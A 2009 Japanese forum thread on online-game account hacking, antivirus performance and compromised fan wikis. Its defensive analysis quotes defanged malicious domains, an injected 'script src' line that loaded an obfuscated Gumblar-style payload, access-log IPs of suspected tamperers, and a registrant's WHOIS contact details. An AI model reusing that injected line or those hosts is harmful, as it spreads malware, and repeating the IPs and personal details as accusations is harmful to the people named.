【重要】ガンホーIDパスワードの変更とゲーム起動ロック設定のお願い [2009/10/01]
ttp://www.ragnarokonline.jp/news/information/notice/item/13100

入手したIDでガンホーゲームズへのログインに挑戦している痕跡が相当数ある模様
このため、痕跡があったIDは強制パスワード無効化、ユーザーにて変更してもらう形に
それに利用されているIPも今後制限の予定

低接続・休止垢が一番やばいね <> (○口○*)さん<>sage<>09/10/10 03:17 ID:wPLyp4cQ0<> >>663
たくし上げに見えた自分は風呂入ってくる <> (○口○*)さん<>sage<>09/10/10 04:11 ID:94FbnDxy0<> >>649
カスペ2010のβ試してみたらパターンファイルの更新でobsoleteって出ておかしいし
ロールバックかけたら固まったままになるしで2009に戻した
ゲームモードってのは使えそうなのに残念だけど2010はまだ様子見だ <> (○口○*)さん<>age<>09/10/10 04:12 ID:yMSd80oU0<> ゲーム内告知も当分流れそうだしageとくか <> (○口○*)さん<>sage<>09/10/10 05:28 ID:H9i9dWCA0<> 3時間ごとに告知するみたいだな <> (○口○*)さん<>sage<>09/10/11 12:38 ID:gCurzi9Y0<> なんでハッキングとかする犯罪者は逮捕されないの? <> (○口○*)さん<>sage<>09/10/11 12:43 ID:rIhe9wGX0<> バレないから <> (○口○*)さん<>sage<>09/10/11 12:48 ID:zXiQp/m00<> 相手が中華だから日本の警察が動けないとかじゃなかったっけ <> (○口○*)さん<>sage<>09/10/11 14:10 ID:bU38hAGk0<> 泳がせている最中なら良いんだがなあ
マスゴミが騒いでもネトゲなんて一般的な遊びじゃないし難しいか <> (○口○*)さん<>age<>09/10/11 16:20 ID:X0wcy1740<> 増えてるからage <> (○口○*)さん<>sage<>09/10/12 07:01 ID:S3v9ygkm0<> これ、他のゲームのリストって何が漏れてるっぽいんだ? <> (○口○*)さん<>sage<>09/10/12 11:04 ID:Q09oGcha0<> 今年のものに限ったものではないだろうけど
春先の「エムゲームジャパン」のとかは大きかったかな
でも、これ一箇所じゃないはず <> (○口○*)さん<>sage<>09/10/12 14:16 ID:WdYHoQUF0<> ハンゲもパス強制変更措置とかいう告知がでてたな
なんなんだろうかこの騒ぎ <> (○口○*)さん<>sage<>09/10/12 14:19 ID:5ZRcXGlA0<> ただ単に自動でアタックすることが今まで無かっただけじゃないの? <> (○口○*)さん<>sage<>09/10/12 14:55 ID:S3v9ygkm0<> 自動でアタックするべきリストが、ウィルスとかじゃなく
どこぞのゲーム会社のリストを使ってるらしいという話なんじゃないかな
パスの最後にgunghoくらいつけておくか <> (○口○*)さん<>sage<>09/10/12 15:01 ID:KT2cb81M0<> >>679
別MMOの鯖を保守してる会社に居たことがあったけど自動アタック自体は
中華のRMT対象になるMMOなら大抵は有った。
ただ、ある程度の規模までならルーターの調整とかで障害を出さなくてすむけれど許容量をこえたら
保守のプランを上げて上位機器をいれるか多少の障害でてもいたしかたなしで今までのプランでいくかを
会社にきいてたから癌の場合も許容量が超えたか超えそうな状態なのかもしれない。 <> (○口○*)さん<>sage<>09/10/12 16:07 ID:qxISYDOj0<> ユーザーの為にMMO業者が動くことは無い、国かどっかから指摘来てアフォーマンスしてるだけ <> (○口○*)さん<>sage<>09/10/12 16:39 ID:sD2ZXMHy0<> >>682
どこか別のスレでやってくれないか <> (○口○*)さん<>sage<>09/10/12 17:29 ID:Y8knON9T0<> 今回の騒動に関する限り、

・他にネトゲの類をやってない
・やっていたとしても、他のID・PASSとRO関連のID・PASSは全く別の文字列
・現在自分が利用している、ネット上でID・PASSを入力するもの全てと、
 ROのID・PASSの文字列に一切の相関性がない

でリスクは極小(≠0)になると考えてok?
他と何の関連もなしに総当たりされてるなら変えてもあんまり意味無いし、
通常(この件以前からある)垢ハックのリスクは変わっていないだろうし。 <> (○口○*)さん<>sage<>09/10/12 17:34 ID:5ZRcXGlA0<> 何らかの単語とか数列とかだと、別の人が偶然使っている
可能性があるからリスクは減らない <> (○口○*)さん<>sage<>09/10/12 17:39 ID:sD2ZXMHy0<> 要するに自分が使っているパスワードの強度自体が問題と
そりゃそうだw <> (○口○*)さん<>sage<>09/10/12 22:16 ID:dJQElmcC0<> 毎度(以下略
再度改竄試行多数着弾。
アドレスは全て
http://www■nicovedeo■com/videocom/A1028sfy■0929■zip

でもって今回はIP変動が謎。よっくわからんです。
Apacheのアクセスログが出力されたら見直してみようかとは思いますが。

-----------------------------------------------------------
UA : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IP : 221.249.9.82(221x249x9x82.ap221.ftth.ucom.ne.jp)

Date : 1255334751(2009/10/12 17:05:51)
Date : 1255334776(2009/10/12 17:06:16)
-----------------------------------------------------------
UA : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IP : 219.67.15.51(fnafb-02p2-51.ppp11.odn.ad.jp)

Date : 1255337519(2009/10/12 17:51:59)
Date : 1255337531(2009/10/12 17:52:11)
-----------------------------------------------------------
UA : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IP : 61.201.50.145(ofsfx-03p2-145.ppp11.odn.ad.jp)

Date : 1255337567(2009/10/12 17:52:47)
Date : 1255337572(2009/10/12 17:52:52)
-----------------------------------------------------------
UA : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IP : 219.67.121.243(ofsfx-03p4-243.ppp11.odn.ad.jp)

Date : 1255337636(2009/10/12 17:53:56)
Date : 1255337681(2009/10/12 17:54:41)
----------------------------------------------------------- <> (○口○*)さん<>sage<>09/10/12 22:27 ID:5ZRcXGlA0<> 結構前から他のBBS等を荒らしているアドレスだから、踏み台リストか何かがあるんだろう <> (○口○*)さん<>sage<>09/10/13 02:21 ID:cqpK6TAv0<> うちは複数垢持っててリネージュと同じIDのやつだけ
ログイン試行されてパス強制変更くらった
多分たまたまだけど
他のゲームと同じIDパスはやっぱり危険ぽいね <> (○口○*)さん<>sage<>09/10/13 02:45 ID:ria1Q2lY0<> たぶんたまたまじゃないよ <> (○口○*)さん<>sage<>09/10/13 02:46 ID:n1GQBBFg0<> >>684
リスクの大小を見るなら、IDは同じだけどパスが全部違う、と言う方がゼロに近そう
たまたま他の人がろのと同じIDで同じパスでない保証など無いからね

>>687
いちおう自分のサイトにも掲示板置いてるんだけど
(PG2にも流用できるという意味で広義に考えて)
アカハックやRMTサイトに類する書き込みをしたホストって
書き込み日時とセットで一覧にしてここで晒すのって有益?
ショボ畏敬地盤なので、ユーザーエージェント無いし
IPかホストも取得時のどちらか片方しか表示されないシステムだけども・・・ <> (○口○*)さん<>sage<>09/10/13 08:06 ID:Wz6ElcQv0<> >>691
んー、書込み自体はどうかなぁ。

中継とかで必ずそのIPから来るならいいんだけど、ボットネットだったり、クロスサイトリクエストフォージュリだったりで
そのIPはじいても、きりがないだけで意味がなかったりするから。ボットネットならまだ該当ISPに報告すれば
利用者に警告出して貰えるんだけど、後者だと罠置かれてるサイトに訪問した時だけだから意味無いし。

ボットネットに組込まれているかもしれない、罠の置かれてるサイトを踏みに行く可能性がある…ような人を
ブロックしておくことは掲示板とかの投稿避けには(きりがないにしても、何度も踏みに行く人避けには)
ある程度価値があるかもしれないが、PG2リストに含める意味はないと思う。 <> (○口○*)さん<>sage<>09/10/13 15:41 ID:vOszFFEr0<> >>692
CSRFで書き込まれるのはサイト運営の問題だろ、対処しろよw <> (○口○*)さん<>sage<>09/10/13 16:46 ID:dvGiB0aa0<> >>692
問題は、botnetに組み込まれているようなユーザーは、警告が出されてもそれに目を通したりしない
可能性が高いということなんだよね。
この辺は、ISP側にもある程度の強権を行使して貰いたいと思ったりもするが。
中途半端なP2P規制に力を入れるより、こっちももっと根本的に対策すべきなのではと。 <> (○口○*)さん<>sage<>09/10/14 00:22 ID:Y78vzx5r0<> 687です。

詳細は省きますが、ucomとodnは別人である可能性が高いです。
つまり当該グループは改竄役の新人を投入してきたと考えられます。

# 中国本土のウイルス作成犯と日本の改竄犯が存在すると考えている。
# 特に少し前のアップローダにウイルスがUPされた事例では、UP者は
# 中国IPであった事がその推測を補強する

そして改竄者のIPがODNに偏っている事より、botnetではないと推測します。
また、同様に無線ただ乗りでもないと思われます。アクセスログでもアクセスが
軽快である(ページを読み込み、CSSを読み込む、そういうような一連のシーケンス)
事よりbotnet・プロクシ・踏み台経由でもないように思われます。
つまり、改竄者側はそんなに技術レベルが高いようには思われません。

687の事例ではodnではfnafbからofsfxにIPが変動している点が謎ではあります。
しかし、それぞれのIPで活動時間が被っておらず、順番に現れているので
ルータ再起動でIPを切り替えた同一人物である可能性もあります。

IPが順次入れ替わっている事から、ネットカフェでもないんじゃないかと思います。
もしかするとエリアが微妙に被っていてどっちの地域のIPも割り振られる事がある、
そんな地方なのかもしれません。 <> (○口○*)さん<>sage<>09/10/14 08:34 ID:uk5fbw8b0<> 予想を前提にされても <> (○口○*)さん<>sage<>09/10/14 10:40 ID:uk5fbw8b0<> Adobe ReaderとAcrobatのパッチが公開
ttp://www.itmedia.co.jp/enterprise/articles/0910/14/news028.html
新バージョンは9.2/8.1.7/7.1.4 <> (○口○*)さん<>sage<>09/10/14 13:29 ID:6CsESxx40<> 月例WindowsUpdate

http://www.microsoft.com/japan/technet/security/bulletin/ms09-oct.mspx

緊急8件、重要5件 <> (○口○*)さん<>sage<>09/10/14 13:36 ID:k6L2wbx10<> そもそもofsfxは前からあってfnafbのほうが珍しいんじゃねえの
ODNはいつものだろうけどucomには報告しといたよ <> (○口○*)さん<>sage<>09/10/14 16:29 ID:hG+QbOdR0<> そもそも立場表明も無しにそんなこと書かれても、情報撹乱かと勘繰ってしまう。 <> (○口○*)さん<>sage<>09/10/14 17:07 ID:PiZuUdch0<> セキュリティソフトのROでの動作具合とかってこのスレでいいのかな?
例えばこのソフトをいれるとROが異様に重くなるとか、このソフトだと快適とかっていう。 <> (○口○*)さん<>sage<>09/10/14 18:17 ID:9n8hV9fF0<> >>701
ここはスレチだと思う
エラースレ辺りでいいんじゃないの? <> (○口○*)さん<>sage<>09/10/14 18:28 ID:HHQy3xOV0<> >>701
RO環境スレかここだね。ここの方が的確なコメントはつくと思うよ。

>>702
>1
><前略>及びセキュリティ全般の話題を取り扱います。

セキュリティ関係全般なので、ROに関係あってもなくても、このスレでOK。スレチってことはないよ。 <> (○口○*)さん<>sage<>09/10/14 18:51 ID:9n8hV9fF0<> 単純に○○は重い、△△は軽いとかまでは違うのでは? <> (○口○*)さん<>sage<>09/10/14 18:53 ID:LQ7XvfAS0<> 動作報告なのか、知りたい(質問する)のかでも変わる気がする
知りたいだけなら物質が一番早いけどね <> ◆SAKA/5/tOU<>sage<>09/10/14 21:56 ID:Y78vzx5r0<> 687です

>>700
当方の投稿の事でしょうか?
確かにソースや根拠、発言者が見えない書き込みは信が置けないものであろうというのは
理解できます。昨今の状況を鑑みるに疑心暗鬼に囚われてしまうのもしょうがないと思います。

ただ、当方の投稿した内容は自身がSiteを管理している人以外には意味の無い情報です。
当方が名前を出す事は情報の信頼度が上がる程度の意味しかないでしょう。ならば別に
出す必要は無いと考えました。本当にその情報が必要な人なら匿名掲示板の使い方も
分かっているでしょうから。またこれは瑣末な理由ですが、持ち上げられるのが
嫌いであるのも理由の一つです。

そして最大の理由は、対策をされる事を嫌った為です。今までの経験上、改竄を行うものたちの
技術レベルは低いと判断していますが、油断は禁物である事も理解しています。
手の内を読まれない事も対策の一つであり、故に匿名で投稿したわけです。内容も
ある程度ぼかしているところが有ったりするのは同じ理由です(連絡会MLには
詳細な情報を流すようしている)。

という訳で、この投稿だけはトリップ出しておきます。 <> (○口○*)さん<>sage<>09/10/14 22:16 ID:yPNxLlwo0<> 一連のカキコは面白く読ませてもらったし、自分には参考になった

もし見当外れな推測なら、「その内容に」即ツッコミ入るんだし
>>696,700みたいなのを気にする必要はないよ <> (○口○*)さん<>sage<>09/10/15 13:30 ID:t3jwTrxZ0<> えーと、なんかこんな告知が出てたみたいなので、一応報告。

ttp://www.ragnarokonline.jp/news/information/notice/item/13139
【重要】運営者詐称に関するご注意 [2009/10/14]

ゲームマスターのキャラクターネームに似せたキャラクターを作成し、
ゲーム内においてガンホーIDやパスワード、生年月日などの
情報を聞き出す悪質な行為が報告されております。

ゲームマスターはゲーム内においてそれらの情報をお聞きすることは
決してありません。ゲームマスターを名乗るキャラクターから
尋ねられても絶対に答えないようお願い致します。

ゲームマスターキャラクターの通常の会話は黄色い文字で表示されます。
また、ゲームマスターキャラクターからの耳打ちは画面上部に表示されます。

ゲームマスターを名乗るキャラクターから対話が寄せられた場合には
上記の点をご確認下さい。
運営者詐称と思われるキャラクターを発見した場合には
WEBヘルプデスクまでご投稿をお願いいたします。

※ゲームマスターのパトロールについてはコチラをご参照下さい。
※ゲームマスターについてはコチラをご参照下さい。 <> (○口○*)さん<>age<>09/10/15 17:28 ID:QuN2/jQS0<> age <> (○口○*)さん<>sage<>09/10/15 18:02 ID:E9EddDkh0<> LiveROでageる意味がわからんのだが <> (○口○*)さん<>sage<>09/10/15 18:42 ID:F8qDZCuI0<> 保守じゃなくて、ブラウザで見た時に前の方で見てもらいたいんじゃない? <> (○口○*)さん<>sage<>09/10/15 18:45 ID:RLo235QO0<> 下にあるの全部あげてるからそんな気の利いた理由じゃないと思うよ <> (○口○*)さん<>sage<>09/10/15 18:56 ID:IUFphSFB0<> 下のほうにあると探しにくいから
適当に上のほうに行って欲しい俺がいる <> (○口○*)さん<>sage<>09/10/15 19:01 ID:MVGd97BZ0<> RO板のhead.txtからリンクが張られているから、わざわざageる必要は無いな。
あとは、専ブラであれば印を付ける機能を用いたり、お気に入り登録すれば見失う事も少なくなる。 <> (○口○*)さん<>sage<>09/10/15 20:04 ID:F8qDZCuI0<> >>713
っお気に入り(ブックマーク)
っ専ブラ <> (○口○*)さん<>sage<>09/10/15 23:35 ID:hfByoIyO0<> 一応ここでいいみたいなので報告兼、やってないのは聞きたい。
あくまでROで使う場合の評価。

・G DATA 2010
ROのキャラ切り替え時に異様に重くなる。
検出率は最高らしいが、ROするには向かないと思う。
最近のスペックマシンなら問題ないけど、古めだといれてる時点でちょっと重そうなので露店PCとかには向かなそう。

・カスペ2010
2010になってからnProと競合して最悪。
タスクバーどころかOSごと固まるに近い症状。
2010だけは現状あり得ない。

・ESET
超軽い。
ROにも全くと言っていいほど影響なし。
但し機能的に物足りないかもしれない。特にFW。

・AVG
軽い。
ROも影響なし。
ただFWはついてないので他をいれる必要有り。

・comodo
軽くもなく重くもなく。
FWもいれると初期でnPro関係をかなりうるさめで検知するが、許可すれば後は快適。
無料にしてはいいと思う。


・Norton
・バスター
は試してないので誰かレポ書いてみて欲しい。
他にも海外無料系とかなんでも。

もう一度書くけど、あくまでROをプレイするうえでどうなのか。
ROに影響が出るのか。
に重点を置いてレポをお願いしたい。 <> (○口○*)さん<>sage<>09/10/15 23:39 ID:3oNBe9N10<> カスペ2009+プロアクティブディフェンス切りが一番安定してて軽めだな <> (○口○*)さん<>sage<>09/10/16 01:43 ID:Vw3ypUz40<> Avira AntiVirは>>716のAVG評価と概ね同じで
シングルコアでも不満無し、FWがないから良くも悪くもうるさくない

言わずともがなアップデート中はROが重くなるけど
一日一回だけPC起動時に更新ということが運用上ほぼ可能だから、そうそう割り込まれない
daily updateをeditして"Daily"を選び、"Repeat job if time has expired"にチェック入れて
時刻として普段PCを使わない時間(休日でもROしないだろう時間)を指定すればいい

当然、休日とかで変な時間にROすると割り込まれるw
起動が遅くなる難点もあり、でも更新タイミングとしては理想に近いと思う <> (○口○*)さん<>sage<>09/10/16 03:13 ID:MpFFtNKm0<> こういうのが出たらしい。

VPNクライアント機能も備えた無償の統合セキュリティ対策ソフト「FortiClient」
ttp://www.forest.impress.co.jp/docs/review/20091014_321305.html <> (○口○*)さん<>sage<>09/10/16 03:50 ID:2QxTxe1U0<> Fortinetか。検体提出後の対応が、カスペ、AntiVirの次位には早かった記憶が有るな。
個人向けの無償版が出たというのは嬉しい限りだ。 <> (○口○*)さん<>sage<>09/10/16 05:06 ID:K9Y1gGX30<> NOD32の軽さに設定をかなり簡素化したのがMSEだと思う

カスペ2009はまだいいけど2010の評判がすごい悪いね
2chのセキュ板がゲハ以上の荒れ放題だけど
期待してたのになぁ <> (○口○*)さん<>sage<>09/10/16 08:26 ID:BgeTtcH/0<> 無料の選択肢が増えてきたな
有料の方も付加価値を足していかないと生き残れないかもしれん <> (○口○*)さん<>sage<>09/10/16 09:25 ID:nUA9OjPJO<> Avastたん… <> (○口○*)さん<>sage<>09/10/16 11:44 ID:+cf7+6PM0<> Avastってだめなの? <> (○口○*)さん<>sage<>09/10/16 12:24 ID:2QxTxe1U0<> シングルコアCPUだと占有時間が長くてね。 <> (○口○*)さん<>sage<>09/10/16 14:26 ID:axkOtwwv0<> ローエンドCPUの代名詞であるCeleronですら、デュアルコア化されて5kで入手できるご時勢、
シングルコア環境はメイン用途から退いた方が精神衛生上良いと思われるよ。 <> (○口○*)さん<>sage<>09/10/16 14:33 ID:EJ+HGSO+0<> パンがなければケーキか・・ <> (○口○*)さん<>sage<>09/10/16 18:09 ID:LB82dQtg0<> カプラクエストwikiがハック受けた模様 <> (○口○*)さん<>age<>09/10/16 18:11 ID:LB82dQtg0<> あげ <> (○口○*)さん<>sage<>09/10/16 18:12 ID:izIYst+E0<> http://xxx.roprice.net/web/ってアドレスに書き換わってましたね
x部分はwwwです <> (○口○*)さん<>sage<>09/10/16 18:30 ID:82iScgKQ0<> リンク改ざんの意味か <> (○口○*)さん<>sage<>09/10/16 19:39 ID:cqqx20Ro0<> >>730

そこ、ウィルスの詰め合わせパックだねw
何種類入ってるんだろ、ざっと見たところ7種類は見えた。
しかし古いセキュリティホール突くタイプばかりだから感染力は
あまり強くないと思うな。

中華ハック業者っぽくはなさそう。
実害がでなさそうなアド貼り付けて騒ぐ様子を見たかった愉快犯かもね。 <> (○口○*)さん<>sage<>09/10/16 19:40 ID:re2ldyUd0<> >>730
書き方は>>4あたり読んでくれ <> (○口○*)さん<>sage<>09/10/16 19:47 ID:axkOtwwv0<>   Domain Name: ROPRICE■NET
  Registrar: BIZCN■COM, INC.
  Whois Server: whois.bizcn■com
  Referral URL: http://www.bizcn■com
  Name Server: NS3.MYHOSTADMIN.NET
  Name Server: NS4.MYHOSTADMIN.NET
  Status: clientDeleteProhibited
  Status: clientTransferProhibited
  Updated Date: 09-oct-2009
  Creation Date: 09-oct-2009
  Expiration Date: 09-oct-2010

Registrant Contact:
  zhang qiang
  qiang zhang 431610082@qq.com
  05972225520 fax: 05972225520
  fu jian long yan xin luo jiang shan xiang tong bo cun
  long yan shi FJ 364000
  cn

どう見てもあちらの連中です。
割と取れたて。
ハイフン入り本物の方は年単位で機能不全が続いていたけど、いよいよこうやって結果的に実害を及ぼすことになったか。 <> (○口○*)さん<>sage<>09/10/16 22:34 ID:j4jdKruM0<> あまり検出率よくないので各社に提出しました。 <> (○口○*)さん<>sage<>09/10/16 22:58 ID:j++wHERG0<> xp sp2あたり使っててwindow updateしてないユーザーならやられるかも知れないが
その程度のマシンなら今頃はウィルスまみれになっているはず。

各社のDB覗いてみたが、最終検出日から数年経たものばかりだね。
ベンダーによっては登録されてないところもあるので検体提出したほうが良さそう。 <> (○口○*)さん<>sage<>09/10/16 23:29 ID:BrNSCL9K0<> >>730
おい、かちゅーで見てるけどハイパーリンクされてるぞ。/w <> (○口○*)さん<>sage<>09/10/16 23:34 ID:viFDekmG0<> 落ち着け

>730をクリックしても件のサイトには行かねぇよ。
xxx <> (○口○*)さん<>sage<>09/10/17 00:00 ID:sk9bg+aT0<> 技術的には*.hoge.comで全部同じページを表示させることは
可能なんだから、行く行かないの問題でない <> (○口○*)さん<>sage<>09/10/17 01:01 ID:BJ9VNn800<> >730のサイトではそんな設定になってねぇよw

もし〜ならばなんてなんとでも言えるだろカスw <> (○口○*)さん<>sage<>09/10/17 01:07 ID:z/rrW3gR0<> ただ、鯖の側で>>730のURIに対してリクエストがあったことはロギング出来るから、
後付けでサブドメインを設定されるリスクは考えられる範囲内であり得る。 <> 724<>sage<>09/10/17 01:13 ID:61d8SIQ80<> >>725
亀だけどサンクス。調べてみて大体わかった。
数年前に組んだPCだからシングルコアのままだぜ。
時々変なとこで落とされるのはコイツのせいだったのか
何か他のソフト検討してみるよ <> (○口○*)さん<>sage<>09/10/17 01:23 ID:sk9bg+aT0<> >>740
そもそもテンプレに従わないことが悪いのに、いちいち煽らないと死ぬのか。 <> (○口○*)さん<>sage<>09/10/17 01:31 ID:31B0X4WD0<> ゴミは無視しろ <> (○口○*)さん<>sage<>09/10/17 04:19 ID:fSWoxdHH0<> >>719
32 :名無しさん@お腹いっぱい。:2009/10/15(木) 02:07:40
・タスクトレイアイコンが無い
・インストール後に機能の有効/無効の設定が出来ない(VPN,WAN最適化,Webフィルタなど)
・クイックスキャンの進捗状況を知らせるUIが存在しない(HDDはガリガリしてる)

やっぱこれは企業向けだな
フリーエディションだと管理機能がないから何やってるか全然わからん

http://pc11.2ch.net/test/read.cgi/sec/1255507148/32 より

実際に使ってないけど、どうなんだろうねえ? <> (○口○*)さん<>sage<>09/10/17 04:27 ID:SpkBDoRF0<> >>745
VirtualPC上の2kとXP ProSP3に入れてみたけど2kのみの現象だった <> (○口○*)さん<>sage<>09/10/17 11:54 ID:MJRSv8sw0<> 「Ragnarok Partyplay Page」ってwikiがあるんだけど、
12日更新分の所に、垢ハクリンクが張られていて、

編集して、更新ボタンをおしたら空白ページに飛ばされて更新できない・・・。

どうすればいいのかな・・・。

15日分はなおせたけど。 <> (○口○*)さん<>sage<>09/10/17 12:42 ID:MzrrpAi/0<> 昨日、MoEからもネ流出によるアカハク注意についてのメールが来たわ。
ベータで1日やっただけなのにまだアカウント残っていたのかw <> (○口○*)さん<>sage<>09/10/17 12:49 ID:qUkYr6wj0<> >>747
更新→空白ページはspam.iniの判定みたいだけど、spam.iniの判定がが
投稿前(差分)でも行われるだかなんだかあるらしいので、中の人が
対応してくれないと直せないですね。中の人もしくは管理組合(?)MLの
誰かしらがここ見てるだろうし、伝えてくれるのを待つしかないかと。 <> (○口○*)さん<>sage<>09/10/17 13:37 ID:VSkDsjgJ0<> >>742
Avast+シングルコアCPUで落とされたりはしないんだが。
スワップが発生した時みたいに、PCが入力に応答しない時間がちょっと続くだけ。 <> (○口○*)さん<>sage<>09/10/17 14:30 ID:Gwps/e/Y0<> >>749
eldgasyk.jpだから弓手wikiの窓口にメールでおk
>Ragnarok Partyplay Page 運営者募集中, Ymlpha(運用)


そもそもrowiki.jpドメインで連絡先のわからないものは
ドメインオーナーである弓手wikiの人に投げていいんじゃねw

・・・ていうのは半分冗談、でもrowiki.jpはどのサブドメインが誰の管轄かがわかりにくいから
subdomain@rowiki.jpという転送アドレスを各管理人に配るといった
共通ドメインならではの統一された窓口があるとわかりやすいと思う

もしくはrowiki.jp配下では(限った話でもないけど)
Site adminに名前と連絡先の載っているページへのリンクを
ちゃんと記すように徹底するだけでもわかりやすくなるかと

まあ現状の様子からして連絡会のメンバー一覧を見れば済むだろうけど
普通はサイト内は探しても、他のサブドメインまでは調べに行かないよね <> (○口○*)さん<>sage<>09/10/17 14:43 ID:zC4+i7nR0<> >>734
福建一味が再びROに攻撃をシフトしてきたのやもしれぬ。
「そろそろ馬鹿な日本人は忘れたであろう」と。
ハニーポット状態の赤石掲示板での爆撃を全く見なくなったのでそう考えてもよさげ。
今後ROがらみの放置FC2ブログなどが危険になりそうな気もする。

気をつけてくれよな! <> (○口○*)さん<>sage<>09/10/17 19:34 ID:j39rb22V0<> >>751
rowiki.jpも浸透が中途半端なのが難点だね。
最近でもローグ・モンク・忍者Wikiの鯖移転があったけど、本来はこういう時にユーザー側は
ブックマークの変更などを意識せずに今まで通りアクセスできるようにするのも理念の一つだったはず。

それと、$modifierlinkにサイト管理人の諸元を示すページへのポインタを記述するのは、もっと徹底した方が良いかな。
基本的には改竄を受けないであろう、数少ない部分でもあるし。 <> (○口○*)さん<>sage<>09/10/17 19:46 ID:tOYuTXXH0<> 言いたいこたわからんでもないが、"理念"とか初耳だわ <> (○口○*)さん<>sage<>09/10/17 21:57 ID:Hd9BQtsq0<> rowikiドメインはもちょっと広まってもいいと思うけどどうにもならない問題も多いからな。

独自ドメインを振り向けられないレンタルサーバ(gamedb.infoとかatpages.jpとか)。
複数ドメイン管理は実質難儀なサービスもある。さくらとか(複数ドメイン同居は出来る
んだけどアクセスログが一緒になって識別できなくなる)。
CoreServerとかxreaは問題なく出来るんだけどその騒動が記憶に新しいところ。
あとはGMO系か・・・・個人的にはあんまり手を出したくない。

安定や安全を買うには金を出せば出すほどいいけど、管理人業って報われないからね・・・・。
よほど(良い意味で)変人じゃないと自宅鯖立てたり、専用サーバ借りたりする気も起きないだろから
現状はしょうがないと思う。 <> (○口○*)さん<>sage<>09/10/17 22:30 ID:/ohtierG0<> 久々に狩場情報ひっそり覗いてみたら隠しスクリプトとかでトロイ検出されたんだけど・・・
状況的に誤検知かとは思うんだけど、今んとこカスペとAvast両方で検出されてる
なんだろこれ <> (○口○*)さん<>sage<>09/10/17 22:35 ID:od3+JFTX0<> マジで?

いつか復活するかと思っていたから、ブラウザ起動時に開くページのひとつに
なっているんだが(・ω・;) <> (○口○*)さん<>sage<>09/10/17 22:56 ID:qUkYr6wj0<> script src=ttp://deadofnightghosttours■com/Quickstart/paranormal■php

こんなのがあるねぇ <> (○口○*)さん<>sage<>09/10/18 00:01 ID:W4qoZyvI0<> 404だった <> (○口○*)さん<>sage<>09/10/18 01:35 ID:3tB6/M290<> >>758
SCOにキャッシュが残ってた
VirusTotal (3/41)
http://www.virustotal.com/jp/analisis/a9be06660025066051cdfb588acae4f56535b35f14ed905fee9d0c4527613083-1255797032

(3/41)だがAvastとカスペが黒判定しているので同じファイルだとおもう
難読化スクリプトだった
検出可否報告スレに出します <> (○口○*)さん<>sage<>09/10/18 01:51 ID:3tB6/M290<> とりあえずスクリプトだけ提出
実行ファイル本体まではちょっと試す環境ないんでわからん。ごめん。 <> (○口○*)さん<>sage<>09/10/18 03:02 ID:9Mdeabjf0<> 狩場情報html内を見ると既に違うscriptに変わってるんだがhuntinfo■xrea■jp自身、もしくは
s61■xrea■comがクラックされてるってこと? <> (○口○*)さん<>sage<>09/10/18 03:04 ID:OvsUa7QZ0<> >>756-761関連
【それでも】xrea.com part147【使う】
ttp://pc11.2ch.net/test/read.cgi/hosting/1253402905/277-283
>ちなみに、何故気がついたかというと
>グーグルのブラウザクロームで
>「このサイトにアクセスするとコンピュータに損害を与える可能性があります。」
>と表示されたからです。
>ウェブサイトに含まれている mystudent.ru のサイトの要素に、
>コンピュータに損害を与えたり無断で動作する不正なソフトウェアが
>含まれている可能性があります。不正なソフトウェアを含むサイトに
>アクセスするだけでコンピュータに感染する場合があります。

また、xrea(core)ということなのか…… <> (○口○*)さん<>sage<>09/10/18 03:30 ID:Lu2dYnoJ0<> >>762 確かに書き換わってますな
ttp://minus-k.com/nejitsu/loader/up24565.png <> (○口○*)さん<>sage<>09/10/18 06:34 ID:Vrr4wZCV0<> 数日前にUnderForge of Lackに
Unknown Threats[予防警戒]として不審なスクリプトが埋め込まれたサイトが見つかってるってあったね

元ネタの人のブログにスクリプトの一部が載ってたんだけど
そのスクリプトとdeadofnightghosttours■comのphpの中身と似てる気がする。
Gumblarウィルス(zlkon/gumblar/martuz)復活?

【ウィルス感染サイト報告】
ttp://www.samarevo.com/salon_list/infection.html <> (○口○*)さん<>sage<>09/10/18 06:43 ID:AWXPFctX0<> 書き換わった方も404だね <> (○口○*)さん<>sage<>09/10/18 08:11 ID:Vrr4wZCV0<> sugotech■comはSCOでAccess denied.でわからないが
deadofnightghosttours■comはトップページ見ると
肝試しツアーの参加者募集みたいな普通のサイトみたいだし
【ウィルス感染サイト報告】 の方にあるphp誘導先も
どれもURL削ると普通っぽいサイトが出てくるから
クラックされて勝手にページ作られてる可能性があるね。
サイト運営者が上書き更新すれば、ウィルスphpも消えるんだろう。
また置かれそうだけど <> (○口○*)さん<>sage<>09/10/18 08:18 ID:fMy7E6Kn0<> >ハイフン入り本物の方は年単位で機能不全が続いていたけど
どうも過去にハイフンなしも存在していたようだ、今回はそれが中華に取得された感じがする。

理由:5年前のRO関連記事にそのドメイン名(wwwなし)がある
*参考 2004年3月22日 (月)
ttp://reckless.justblog.jp/recklessdrivin/2004/03/post-23c8-1.html
違うというのならばこのブログがやられて該当記事のリンクだけいじられたということになる。

ネトゲ関連で独自ドメインとかは最低でもそのサービス終了するまでは維持しないと今回のようなことが起こりうる。
www付きはLivedoorwikiで奴らがかつて目を付けたところを中心に多数の爆撃痕がある。
Livedoorでは既に赤枠表示なのでそのうちwwwなしを別の場所に投下するかもしれぬ。

気をつけてくれよな! <> 768<>sage<>09/10/18 08:25 ID:fMy7E6Kn0<> 上のでミス、一番上にこれを入れ忘れてた。
>>734

連投ごめん <> (○口○*)さん<>sage<>09/10/18 10:49 ID:11vGIPZI0<> SCO落ちてる? <> (○口○*)さん<>sage<>09/10/18 11:11 ID:Vrr4wZCV0<> >>770
メンテらしい

Gumblar Website Botnet Awakes
ttp://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html
別件かもだけど <> (○口○*)さん<>sage<>09/10/18 11:46 ID:W4qoZyvI0<> >>765
ソースチェッカから拾って1段目だけデコードしたけど
id=3とかで降ってくるアレですね。gumbler復活か…めんどくさ。 <> (○口○*)さん<>sage<>09/10/18 14:28 ID:11vGIPZI0<> >>767

デコードして遊んでるウチに間違って実行させてしまった
サラトガリピーターの方ね。

サイトからPDF食わせられて、リーダーが起動されるとSSMが教えてくれた。
試しにそのまま実行したがアドビリーダーじゃなくてFoxItReader使ってたせいか、そこで一連の
プロセスは終了。
セキュリティホールは突けなかったようです。

